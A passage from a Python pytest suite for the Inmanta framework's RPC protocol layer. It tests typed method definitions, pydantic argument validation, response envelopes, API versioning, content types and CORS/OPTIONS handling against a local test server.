error status (599) that is generated by the client rather than by the server.
"""
from inmanta.config import Config
Config.load_config()
port = str(list(app._sockets.values())[0].getsockname()[1])
Config.set("client_rest_transport", "port", port)
Config.set("client_rest_transport", "request_timeout", "1")
from inmanta import protocol
client = protocol.Client("client")
x = await client.get_file(id="abc")
assert x.code == 599
assert "message" in x.result
@pytest.mark.asyncio
async def test_method_properties():
"""
Test method properties decorator and helper functions
"""
@protocol.method(path="/test", operation="PUT", client_types=["api"], api_prefix="x", api_version=2)
def test_method(name):
"""
Create a new project
"""
props = protocol.common.MethodProperties.methods["test_method"][0]
assert "Authorization" in props.get_call_headers()
assert props.get_listen_url() == "/x/v2/test"
assert props.get_call_url({}) == "/x/v2/test"
@pytest.mark.asyncio
async def test_invalid_client_type():
"""
Test an invalid client type
"""
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.method(path="/test", operation="PUT", client_types=["invalid"])
def test_method(name):
"""
Create a new project
"""
assert "Invalid client type invalid specified for function" in str(e)
@pytest.mark.asyncio
async def test_call_arguments_defaults():
"""
Test processing RPC messages
"""
@protocol.method(path="/test", operation="PUT", client_types=["api"])
def test_method(name: str, value: int = 10):
"""
Create a new project
"""
call = CallArguments(protocol.common.MethodProperties.methods["test_method"][0], {"name": "test"}, {})
await call.process()
assert call.call_args["name"] == "test"
assert call.call_args["value"] == 10
def test_create_client():
with pytest.raises(AssertionError):
protocol.SyncClient("agent", "120")
with pytest.raises(AssertionError):
protocol.Client("agent", "120")
@pytest.mark.asyncio
async def test_pydantic():
"""
Test validating pydantic objects
"""
class Project(BaseModel):
id: uuid.UUID
name: str
@protocol.method(path="/test", operation="PUT", client_types=["api"])
def test_method(project: Project):
"""
Create a new project
"""
id = uuid.uuid4()
call = CallArguments(
protocol.common.MethodProperties.methods["test_method"][0], {"project": {"name": "test", "id": str(id)}}, {}
)
await call.process()
project = call.call_args["project"]
assert project.name == "test"
assert project.id == id
with pytest.raises(exceptions.BadRequest):
call = CallArguments(
protocol.common.MethodProperties.methods["test_method"][0], {"project": {"name": "test", "id": "abcd"}}, {}
)
await call.process()
def test_pydantic_json():
"""
Test running pydantic objects through the JSON encoder
"""
class Options(str, Enum):
yes = "yes"
no = "no"
class Project(BaseModel):
id: uuid.UUID
name: str
opts: Options
project = Project(id=uuid.uuid4(), name="test", opts="no")
assert project.opts == Options.no
json_string = json_encode(project)
data = json.loads(json_string)
assert "id" in data
assert "name" in data
assert data["id"] == str(project.id)
assert data["name"] == "test"
# Now create the project again
new = Project(**data)
assert project == new
assert project is not new
@pytest.mark.asyncio
async def test_pydantic_alias(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Round trip test on aliased object
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
source: str
validate_: bool
class Config:
fields = {"validate_": {"alias": "validate"}}
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(project: Project) -> ReturnValue[Project]: # NOQA
"""
Create a new project
"""
@protocol.typedmethod(path="/test2", operation="POST", client_types=["api"])
def test_method2(project: List[Project]) -> ReturnValue[List[Project]]: # NOQA
"""
Create a new project
"""
@protocol.handle(test_method)
async def test_methodi(self, project: Project) -> ReturnValue[Project]:
new_project = project.copy()
return ReturnValue(response=new_project)
@protocol.handle(test_method2)
async def test_method2i(self, project: List[Project]) -> ReturnValue[List[Project]]:
return ReturnValue(response=project)
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
projectt = Project(id=uuid.uuid4(), source="test", validate=True)
assert projectt.validate_ is True
projectf = Project(id=uuid.uuid4(), source="test", validate=False)
assert projectf.validate_ is False
async def roundtrip(obj: Project) -> None:
data = await client.test_method(obj)
assert obj.validate_ == data.result["data"]["validate"]
data = await client.test_method2([obj])
assert obj.validate_ == data.result["data"][0]["validate"]
await roundtrip(projectf)
await roundtrip(projectt)
@pytest.mark.asyncio
async def test_return_non_warnings(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test returning None while still pushing warnings
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(name: str) -> ReturnValue[None]: # NOQA
"""
Create a new project
"""
@protocol.handle(test_method)
async def test_method_handler(self, name) -> ReturnValue[None]:
rv = ReturnValue()
rv.add_warnings(["error1", "error2"])
return rv
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
response = await client.test_method("x")
assert response.code == 200
assert "data" in response.result
assert response.result["data"] is None
assert "metadata" in response.result
assert "warnings" in response.result["metadata"]
assert "error1" in response.result["metadata"]["warnings"]
@pytest.mark.asyncio
async def test_invalid_handler():
"""
Handlers should be async
"""
with pytest.raises(ValueError):
class ProjectServer(ServerSlice):
@protocol.method(path="/test", operation="POST", client_types=["api"])
def test_method(self):
"""
Create a new project
"""
@protocol.handle(test_method)
def test_method(self):
return
@pytest.mark.asyncio
async def test_return_value(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test the use and validation of methods that use common.ReturnValue
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
id: uuid.UUID
name: str
class ProjectServer(ServerSlice):
@protocol.method(path="/test", operation="POST", client_types=["api"])
def test_method(project: Project) -> ReturnValue[Project]: # NOQA
"""
Create a new project
"""
@protocol.handle(test_method)
async def test_method(self, project: Project) -> ReturnValue[Project]:
new_project = project.copy()
return ReturnValue(response=new_project)
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "id" in result.result
assert "name" in result.result
@pytest.mark.asyncio
async def test_return_model(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test the use and validation of methods that use common.ReturnValue
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
id: uuid.UUID
name: str
class ProjectServer(ServerSlice):
@protocol.method(path="/test", operation="POST", client_types=["api"])
def test_method(project: Project) -> Project: # NOQA
"""
Create a new project
"""
@protocol.method(path="/test2", operation="POST", client_types=["api"])
def test_method2(project: Project) -> None: # NOQA
pass
@protocol.method(path="/test3", operation="POST", client_types=["api"])
def test_method3(project: Project) -> None: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, project: Project) -> Project:
new_project = project.copy()
return new_project
@protocol.handle(test_method2)
async def test_method2(self, project: Project) -> None:
pass
@protocol.handle(test_method3)
async def test_method3(self, project: Project) -> None:
return 1
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "id" in result.result
assert "name" in result.result
result = await client.test_method2({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
result = await client.test_method3({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 500
@pytest.mark.asyncio
async def test_data_envelope(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test the use and validation of methods that use common.ReturnValue
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
id: uuid.UUID
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(project: Project) -> ReturnValue[Project]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, project: Project) -> ReturnValue[Project]:
new_project = project.copy()
return ReturnValue(response=new_project)
@protocol.typedmethod(path="/test2", operation="POST", client_types=["api"], envelope_key="method")
def test_method2(project: Project) -> ReturnValue[Project]: # NOQA
pass
@protocol.handle(test_method2)
async def test_method2(self, project: Project) -> ReturnValue[Project]:
new_project = project.copy()
return ReturnValue(response=new_project)
@protocol.method(path="/test3", operation="POST", client_types=["api"], envelope=True)
def test_method3(project: Project): # NOQA
pass
@protocol.handle(test_method3)
async def test_method3(self, project: dict) -> Apireturn:
return 200, {"id": 1, "name": 2}
@protocol.method(path="/test4", operation="POST", client_types=["api"], envelope=True, envelope_key="project")
def test_method4(project: Project): # NOQA
pass
@protocol.handle(test_method4)
async def test_method4(self, project: dict) -> Apireturn:
return 200, {"id": 1, "name": 2}
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
# 1
result = await client.test_method({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "data" in result.result
assert "id" in result.result["data"]
assert "name" in result.result["data"]
# 2
result = await client.test_method2({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "method" in result.result
assert "id" in result.result["method"]
assert "name" in result.result["method"]
# 3
result = await client.test_method3({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "data" in result.result
assert "id" in result.result["data"]
assert "name" in result.result["data"]
# 4
result = await client.test_method4({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "project" in result.result
assert "id" in result.result["project"]
assert "name" in result.result["project"]
@pytest.mark.asyncio
async def test_invalid_paths():
"""
Test path validation
"""
with pytest.raises(InvalidPathException) as e:
@protocol.method(path="test", operation="PUT", client_types=["api"], api_prefix="x", api_version=2)
def test_method(name):
pass
assert "test should start with a /" == str(e.value)
with pytest.raises(InvalidPathException) as e:
@protocol.method(path="/test/<othername>", operation="PUT", client_types=["api"], api_prefix="x", api_version=2)
def test_method2(name):
pass
assert str(e.value).startswith("Variable othername in path /test/<othername> is not defined in function")
@pytest.mark.asyncio
async def test_nested_paths(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test overlapping path definition"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<data>", operation="GET", client_types=["api"])
def test_method(data: str) -> Project: # NOQA
pass
@protocol.typedmethod(path="/test/<data>/config", operation="GET", client_types=["api"])
def test_method2(data: str) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: str) -> Project:
# verify that URL encoded data is properly decoded
assert "%20" not in data
return Project(name="test_method")
@protocol.handle(test_method2)
async def test_method2(self, data: str) -> Project:
return Project(name="test_method2")
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method({"data": "test "})
assert result.code == 200
assert "test_method" == result.result["data"]["name"]
client = protocol.Client("client")
result = await client.test_method2({"data": "test"})
assert result.code == 200
assert "test_method2" == result.result["data"]["name"]
@pytest.mark.asyncio
async def test_list_basemodel_argument(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test list of basemodel arguments and primitive types"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: List[Project], data2: List[int]) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: List[Project], data2: List[int]) -> Project:
assert len(data) == 1
assert data[0].name == "test"
assert len(data2) == 3
return Project(name="test_method")
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method(data=[{"name": "test"}], data2=[1, 2, 3])
assert result.code == 200
assert "test_method" == result.result["data"]["name"]
@pytest.mark.asyncio
async def test_dict_basemodel_argument(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test dict of basemodel arguments and primitive types"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: Dict[str, Project], data2: Dict[str, int]) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: Dict[str, Project], data2: Dict[str, int]) -> Project:
assert len(data) == 1
assert data["projectA"].name == "test"
assert len(data2) == 3
return Project(name="test_method")
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method(data={"projectA": {"name": "test"}}, data2={"1": 1, "2": 2, "3": 3})
assert result.code == 200
assert "test_method" == result.result["data"]["name"]
@pytest.mark.asyncio
async def test_dict_with_optional_values(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test dict which may have None as a value"""
configure(unused_tcp_port, database_name, postgres_db.port)
types = Union[pydantic.StrictInt, pydantic.StrictStr]
class Result(BaseModel):
val: Optional[types]
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: Dict[str, Optional[types]]) -> Result: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: Dict[str, Optional[types]]) -> Result:
assert len(data) == 1
assert "test" in data
return Result(val=data["test"])
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method2(data: Optional[str] = None) -> None: # NOQA
pass
@protocol.handle(test_method2)
async def test_method2(self, data: Optional[str] = None) -> None:
assert data is None
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method(data={"test": None})
assert result.code == 200
assert result.result["data"]["val"] is None
result = await client.test_method(data={"test": 5})
assert result.code == 200
assert result.result["data"]["val"] == 5
result = await client.test_method(data={"test": "test123"})
assert result.code == 200
assert result.result["data"]["val"] == "test123"
result = await client.test_method2()
assert result.code == 200
result = await client.test_method2(data=None)
assert result.code == 200
@pytest.mark.asyncio
async def test_dict_and_list_return(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test list of basemodel arguments"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: Project) -> List[Project]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: Project) -> List[Project]: # NOQA
return [Project(name="test_method")]
@protocol.typedmethod(path="/test2", operation="POST", client_types=["api"])
def test_method2(data: Project) -> List[str]: # NOQA
pass
@protocol.handle(test_method2)
async def test_method2(self, data: Project) -> List[str]: # NOQA
return ["test_method"]
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method(data={"name": "test"})
assert result.code == 200
assert len(result.result["data"]) == 1
assert "test_method" == result.result["data"][0]["name"]
result = await client.test_method2(data={"name": "test"})
assert result.code == 200
assert len(result.result["data"]) == 1
assert "test_method" == result.result["data"][0]
@pytest.mark.asyncio
async def test_method_definition():
"""
Test typed methods with wrong annotations
"""
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method1(name) -> None:
"""
Create a new project
"""
assert "has no type annotation." in str(e.value)
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method2(name: Iterator[str]) -> None:
"""
Create a new project
"""
assert "Type typing.Iterator[str] of argument name can only be generic List or Dict" in str(e.value)
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method3(name: List[object]) -> None:
"""
Create a new project
"""
assert (
"Type object of argument name must be a either BaseModel, Enum, UUID, str, float, int, StrictNonIntBool, datetime, "
"bytes or a List of these types or a Dict with str keys and values of these types."
) in str(e.value)
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method4(name: Dict[int, str]) -> None:
"""
Create a new project
"""
assert "Type typing.Dict[int, str] of argument name must be a Dict with str keys and not int" in str(e.value)
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method5(name: Dict[str, object]) -> None:
"""
Create a new project
"""
assert (
"Type object of argument name must be a either BaseModel, Enum, UUID, str, float, int, StrictNonIntBool, datetime, "
"bytes or a List of these types or a Dict with str keys and values of these types."
) in str(e.value)
@protocol.typedmethod(path="/service_types/<service_type>", operation="DELETE", client_types=["api"])
def lcm_service_type_delete(tid: uuid.UUID, service_type: str) -> None:
"""Delete an existing service type."""
def test_optional():
@protocol.typedmethod(path="/service_types/<service_type>", operation="DELETE", client_types=["api"])
def lcm_service_type_delete(tid: uuid.UUID, service_type: str, version: Optional[str] = None) -> None:
"""Delete an existing service type."""
@pytest.mark.asyncio
async def test_union_types(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test use of union types"""
configure(unused_tcp_port, database_name, postgres_db.port)
SimpleTypes = Union[float, int, StrictBool, str] # NOQA
AttributeTypes = Union[SimpleTypes, List[SimpleTypes], Dict[str, SimpleTypes]] # NOQA
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method(data: SimpleTypes, version: Optional[int] = None) -> List[SimpleTypes]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: SimpleTypes, version: Optional[int] = None) -> List[SimpleTypes]: # NOQA
if isinstance(data, list):
return data
return [data]
@protocol.typedmethod(path="/testp", operation="POST", client_types=["api"])
def test_methodp(data: AttributeTypes, version: Optional[int] = None) -> List[SimpleTypes]: # NOQA
pass
@protocol.handle(test_methodp)
async def test_methodp(self, data: AttributeTypes, version: Optional[int] = None) -> List[SimpleTypes]: # NOQA
if isinstance(data, list):
return data
return [data]
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_methodp(data=[5], version=7)
assert result.code == 200
assert len(result.result["data"]) == 1
assert 5 == result.result["data"][0]
result = await client.test_method(data=5, version=3)
assert result.code == 200
assert len(result.result["data"]) == 1
assert 5 == result.result["data"][0]
result = await client.test_method(data=5)
assert result.code == 200
assert len(result.result["data"]) == 1
assert 5 == result.result["data"][0]
result = await client.test_method(data=5, version=7)
assert result.code == 200
assert len(result.result["data"]) == 1
assert 5 == result.result["data"][0]
@pytest.mark.asyncio
async def test_basemodel_validation(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test validation of basemodel arguments and return, and how they are reported"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
value: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: Project) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: Project) -> Project: # NOQA
return Project()
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
# Check validation of arguments
result = await client.test_method(data={})
assert result.code == 400
assert "error_details" in result.result
details = result.result["error_details"]["validation_errors"]
assert len(details) == 2
name = [d for d in details if d["loc"] == ["data", "name"]][0]
value = [d for d in details if d["loc"] == ["data", "value"]][0]
assert name["msg"] == "field required"
assert value["msg"] == "field required"
# Check the validation of the return value
result = await client.test_method(data={"name": "X", "value": "Y"})
assert result.code == 500
assert "data validation error" in result.result["message"]
@pytest.mark.asyncio
async def test_ACOA_header(server):
"""
Test that the Access-Control-Allow-Origin header is only returned when it is explicitly configured.
"""
port = opt.get_bind_port()
url = f"http://localhost:{port}/api/v1/environment"
request = HTTPRequest(url=url, method="GET")
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
assert response.headers.get("Access-Control-Allow-Origin") is None
config.Config.set("server", "access-control-allow-origin", "*")
response = await client.fetch(request)
assert response.code == 200
assert response.headers.get("Access-Control-Allow-Origin") == "*"
@pytest.mark.asyncio
async def test_multi_version_method(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test multi version methods"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
value: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test2", operation="POST", client_types=["api"], api_version=3)
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"], api_version=2, envelope_key="data")
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"], api_version=1, envelope_key="project")
def test_method(project: Project) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, project: Project) -> Project: # NOQA
return project
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# rest call
port = opt.get_bind_port()
request = HTTPRequest(
url=f"http://localhost:{port}/api/v1/test", method="POST", body=json_encode({"project": {"name": "a", "value": "b"}})
)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
body = json.loads(response.body)
assert "project" in body
request = HTTPRequest(
url=f"http://localhost:{port}/api/v2/test", method="POST", body=json_encode({"project": {"name": "a", "value": "b"}})
)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
body = json.loads(response.body)
assert "data" in body
request = HTTPRequest(
url=f"http://localhost:{port}/api/v3/test2", method="POST", body=json_encode({"project": {"name": "a", "value": "b"}})
)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
body = json.loads(response.body)
assert "data" in body
# client based calls
client = protocol.Client("client")
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "project" in response.result
client = protocol.Client("client", version_match=VersionMatch.highest)
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "data" in response.result
client = protocol.Client("client", version_match=VersionMatch.exact, exact_version=1)
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "project" in response.result
client = protocol.Client("client", version_match=VersionMatch.exact, exact_version=2)
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "data" in response.result
@pytest.mark.asyncio
async def test_multi_version_handler(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test multi version methods"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
value: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"], api_version=2, envelope_key="data")
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"], api_version=1, envelope_key="project")
def test_method(project: Project) -> Project: # NOQA
pass
@protocol.handle(test_method, api_version=1)
async def test_methodX(self, project: Project) -> Project: # NOQA
return Project(name="v1", value="1")
@protocol.handle(test_method, api_version=2)
async def test_methodY(self, project: Project) -> Project: # NOQA
return Project(name="v2", value="2")
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "project" in response.result
assert response.result["project"]["name"] == "v1"
client = protocol.Client("client", version_match=VersionMatch.highest)
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "data" in response.result
assert response.result["data"]["name"] == "v2"
@pytest.mark.asyncio
async def test_simple_return_type(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test methods with simple return types"""
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(project: str) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_methodY(self, project: str) -> str: # NOQA
return project
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method(project="x")
assert response.code == 200
assert response.result["data"] == "x"
@pytest.mark.asyncio
async def test_html_content_type(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test whether API endpoints with a text/html content-type work."""
configure(unused_tcp_port, database_name, postgres_db.port)
html_content = "<html><body>test</body></html>"
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method() -> ReturnValue[str]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[str]: # NOQA
return ReturnValue(response=html_content, content_type=HTML_CONTENT)
rs = Server()
server = TestServer(name="testserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method()
assert response.code == 200
assert response.result == html_content
@pytest.mark.asyncio
async def test_html_content_type_with_utf8_encoding(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test whether API endpoints with a "text/html; charset=UTF-8" content-type work."""
configure(unused_tcp_port, database_name, postgres_db.port)
html_content = "<html><body>test</body></html>"
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method() -> ReturnValue[str]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[str]: # NOQA
return ReturnValue(response=html_content, content_type=HTML_CONTENT_WITH_UTF8_CHARSET)
rs = Server()
server = TestServer(name="testserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method()
assert response.code == 200
assert response.result == html_content
@pytest.mark.asyncio
async def test_octet_stream_content_type(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test whether API endpoints with an application/octet-stream content-type work."""
configure(unused_tcp_port, database_name, postgres_db.port)
byte_stream = b"test123"
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method() -> ReturnValue[bytes]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[bytes]: # NOQA
return ReturnValue(response=byte_stream, content_type=OCTET_STREAM_CONTENT)
rs = Server()
server = TestServer(name="testserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method()
assert response.code == 200
assert response.result == byte_stream
@pytest.mark.asyncio
async def test_zip_content_type(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test whether API endpoints with an application/zip content-type work."""
configure(unused_tcp_port, database_name, postgres_db.port)
zip_content = b"test123"
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method() -> ReturnValue[bytes]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[bytes]: # NOQA
return ReturnValue(response=zip_content, content_type=ZIP_CONTENT)
rs = Server()
server = TestServer(name="testserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method()
assert response.code == 200
assert response.result == zip_content
@pytest.fixture
async def options_server():
@protocol.typedmethod(path="/test", operation="OPTIONS", client_types=["api"])
def test_method() -> ReturnValue[str]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[str]: # NOQA
return ReturnValue(response="content")
return TestServer(name="testserver")
@pytest.fixture
def options_request(unused_tcp_port):
return HTTPRequest(
url=f"http://localhost:{unused_tcp_port}/api/v1/test",
method="OPTIONS",
connect_timeout=1.0,
request_timeout=1.0,
decompress_response=True,
)
@pytest.mark.asyncio
@pytest.mark.parametrize("auth_enabled, auth_header_allowed", [(True, True), (False, False)])
async def test_auth_enabled_options_method(
auth_enabled,
auth_header_allowed,
unused_tcp_port,
postgres_db,
database_name,
async_finalizer,
options_server,
options_request,
):
configure(unused_tcp_port, database_name, postgres_db.port)
config.Config.set("server", "auth", str(auth_enabled))
rs = Server()
rs.add_slice(options_server)
await rs.start()
async_finalizer.add(options_server.stop)
async_finalizer.add(rs.stop)
client = AsyncHTTPClient()
response = await client.fetch(options_request)
assert response.code == 200
assert ("Authorization" in response.headers.get("Access-Control-Allow-Headers")) == auth_header_allowed
@pytest.mark.asyncio
async def test_required_header_not_present(server):
client = AsyncHTTPClient()
response = await client.fetch(f"http://localhost:{server_bind_port.get()}/api/v2/environment_settings", raise_error=False)
assert response.code == 400
@pytest.mark.asyncio
async def test_malformed_json(server):
"""
Tests sending malformed json to the server
"""
port = opt.get_bind_port()
url = f"http://localhost:{port}/api/v2/environment"
request = HTTPRequest(url=url, method="PUT", body='{"name": env}')
client = AsyncHTTPClient()
response = await client.fetch(request, raise_error=False)
assert response.code == 400
assert (
json.loads(response.body)["message"]
== "The request body couldn't be decoded as a JSON: Expecting value: line 1 column 10 (char 9)"
)
@pytest.mark.asyncio
async def test_tuple_index_out_of_range(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
value: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(
api_prefix="test", path="/project/<project>", operation="GET", arg_options=ENV_OPTS, client_types=["api"]
)
def test_method(
tid: uuid.UUID, project: str, include_deleted: bool = False
) -> List[Union[uuid.UUID, Project, bool]]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(
self, tid: uuid.UUID, project: Project, include_deleted: bool = False
) -> List[Union[uuid.UUID, Project, bool]]: # NOQA
return [tid, project, include_deleted]
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
